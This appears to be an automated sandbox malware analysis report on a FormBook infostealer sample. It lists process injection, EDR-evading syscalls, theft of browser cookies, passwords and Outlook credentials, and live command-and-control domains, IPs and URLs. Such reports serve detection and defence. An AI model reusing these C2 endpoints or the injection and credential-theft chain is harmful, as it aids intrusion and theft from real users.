            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\makecab.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: NULL target: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: NULL target: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\makecab.exeThread register set: target process: 8044Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\makecab.exeThread APC queued: target process: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2312008Jump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8mmZ7Bkoj1.exe"Jump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeProcess created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: eKxwLXHhqpgy.exe, 00000005.00000002.3561336986.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000000.2057199980.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561462421.0000000001851000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: eKxwLXHhqpgy.exe, 00000005.00000002.3561336986.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000000.2057199980.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561462421.0000000001851000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: eKxwLXHhqpgy.exe, 00000005.00000002.3561336986.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000000.2057199980.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561462421.0000000001851000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: eKxwLXHhqpgy.exe, 00000005.00000002.3561336986.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000000.2057199980.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561462421.0000000001851000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: 8mmZ7Bkoj1.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\makecab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528955 Sample: 8mmZ7Bkoj1.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 28 www.impo232rt.xyz 2->28 30 www.trafegomagico.shop 2->30 32 12 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 4 other signatures 2->50 10 8mmZ7Bkoj1.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 eKxwLXHhqpgy.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 makecab.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 eKxwLXHhqpgy.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 thepeatear.online 84.32.84.32, 50016, 50017, 50018 NTT-LT-ASLT Lithuania 22->34 36 www.cenfresh.life 199.192.21.169, 50008, 50009, 50010 NAMECHEAP-NETUS United States 22->36 38 3 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            8mmZ7Bkoj1.exe47%ReversingLabsWin32.Trojan.AutoitInject
            8mmZ7Bkoj1.exe100%AviraHEUR/AGEN.1321671
            8mmZ7Bkoj1.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.impo232rt.xyz
            		176.32.38.141
            		truetrue
              		unknown
              crowsecurity.cloud
              		3.33.130.190
              		truetrue
                		unknown
                digitalbloom.info
                		3.33.130.190
                		truetrue
                  		unknown
                  www.cenfresh.life
                  		199.192.21.169
                  		truetrue
                    		unknown
                    thepeatear.online
                    		84.32.84.32
                    		truetrue
                      		unknown
                      www.nad5.shop
                      		156.226.22.233
                      		truetrue
                        		unknown
                        myjiorooms.services
                        		3.33.130.190
                        		truetrue
                          		unknown
                          www.thepeatear.online
                          		unknown
                          		unknowntrue
                            		unknown
                            www.mktimediato.online
                            		unknown
                            		unknowntrue
                              		unknown
                              www.digitalbloom.info
                              		unknown
                              		unknowntrue
                                		unknown
                                www.trafegomagico.shop
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.schoolsfrirstfcu.org
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.crowsecurity.cloud
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.myjiorooms.services
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.thepeatear.online/pt4m/?nrs8j=AzKTe9sU/un6FWh8J4Z/TBPHes/wm2VwkqZ8OIQkGxADXwK45dBXsHOALtRz338sDHJ9qmiySJX4ofZpl75YgKir24cXfpRpIxKZjJwadTshiHDArMKxe74=&Yp=eXMH4fkptrue
                                          		unknown
                                          http://www.impo232rt.xyz/azcx/?nrs8j=irMYamRxHtj3NMD2tLgxvViSvpLqwhvn7ehZdObCxtX/sdDuQfcDsrOzu60Trx/UY7Wv4F1shT0OqKdZ6j2zU9VfvWpTmK3e9j1Z+5zsY7kVMmPgkcjeH9Y=&Yp=eXMH4fkptrue
                                            		unknown
                                            http://www.crowsecurity.cloud/oigd/true
                                              		unknown
                                              http://www.nad5.shop/i70z/?Yp=eXMH4fkp&nrs8j=8fwlLwm+T0nphGhW7PHH3xFKB5SB8SFc9+r/t0QDCeclosptBaw61DZvImsaGCeeZR7Fl0K64LM59E0NLQ1vdm4QrRMTpos6Kj6ui5/Q8OeERMbnF/TN1fg=true
                                                		unknown
                                                http://www.digitalbloom.info/paa2/?Yp=eXMH4fkp&nrs8j=qDBzf3Em8FMnDuZYbVfiL5sknZWYhueoT0F4r09hh9DCbJoHqCNNB+hYoG1Us3VrdNJQeWmKv3CCTbgwH3NiU5qDwpXvlmSTPuYmawVAsPwUoUwLb74j9YI=true
                                                  		unknown
                                                  http://www.myjiorooms.services/tlbx/true
                                                    		unknown
                                                    http://www.cenfresh.life/6iok/?Yp=eXMH4fkp&nrs8j=Lr8I5vR8kZnO1BXwYoMTGZrf0zW9P9gXQAsQehgeDaNdyJVo64QKCUs+Z9VbQDUfL8+SUHVZNFYLvGD3PrMcSw81RdJBHrPngUHAq0ps+A4FRAxn/QrS6wg=true
                                                      		unknown
                                                      http://www.impo232rt.xyz/azcx/true
                                                        		unknown
                                                        http://www.digitalbloom.info/paa2/true
                                                          		unknown
                                                          http://www.thepeatear.online/pt4m/true
                                                            		unknown
                                                            http://www.cenfresh.life/6iok/true
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://ac.ecosia.org/autocomplete?q=makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://duckduckgo.com/chrome_newtabmakecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://duckduckgo.com/ac/?q=makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icomakecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.crowsecurity.cloudeKxwLXHhqpgy.exe, 00000007.00000002.3563473884.0000000005680000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmakecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.ecosia.org/newtab/makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  199.192.21.169
                                                                  		www.cenfresh.lifeUnited States
                                                                  		22612NAMECHEAP-NETUStrue
                                                                  156.226.22.233
                                                                  		www.nad5.shopSeychelles
                                                                  		132813AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKtrue
                                                                  84.32.84.32
                                                                  		thepeatear.onlineLithuania
                                                                  		33922NTT-LT-ASLTtrue
                                                                  176.32.38.141
                                                                  		www.impo232rt.xyzRussian Federation
                                                                  		51659ASBAXETRUtrue
                                                                  3.33.130.190
                                                                  		crowsecurity.cloudUnited States
                                                                  		8987AMAZONEXPANSIONGBtrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1528955
                                                                  Start date and time:2024-10-08 14:16:30 +02:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 38s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:8mmZ7Bkoj1.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:64c5d2e74511fbe252cb0351a21a86df6d98ac07bd4cc92a35086b1b1659257a.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@10/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 80%
                                                                  HCA Information:
                                                                  • Successful, ratio: 87%
                                                                  • Number of executed functions: 14
                                                                  • Number of non-executed functions: 335
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • VT rate limit hit for: 8mmZ7Bkoj1.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  08:18:45API Interceptor6159437x Sleep call for process: makecab.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  199.192.21.169PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                  • www.selftip.top/85su/
                                                                  update SOA.exeGet hashmaliciousFormBookBrowse
                                                                  • www.technectar.top/ghvt/
                                                                  NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                  • www.selftip.top/85su/
                                                                  RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                  • www.zenscape.top/d8cw/
                                                                  Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                                  • www.zenscape.top/d8cw/
                                                                  DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                  • www.selftip.top/85su/
                                                                  DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                  • www.urbanpulse.help/r50h/
                                                                  PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                  • www.selftip.top/85su/
                                                                  SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                  • www.zenscape.top/d8cw/
                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                  • www.urbanpulse.help/r50h/
                                                                  156.226.22.233RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • www.nad5.shop/2xqm/
                                                                  September Order.exeGet hashmaliciousFormBookBrowse
                                                                  • www.nad5.shop/cy90/
                                                                  84.32.84.32Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                  • www.pinkpantys.shop/cyro/
                                                                  YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                                  • www.pakmartcentral.shop/ml5l/
                                                                  Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                  • www.b-ambu.com/a2tr/
                                                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • www.agilizeimob.app/we8s/
                                                                  Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.casesrep.site/7z6q/
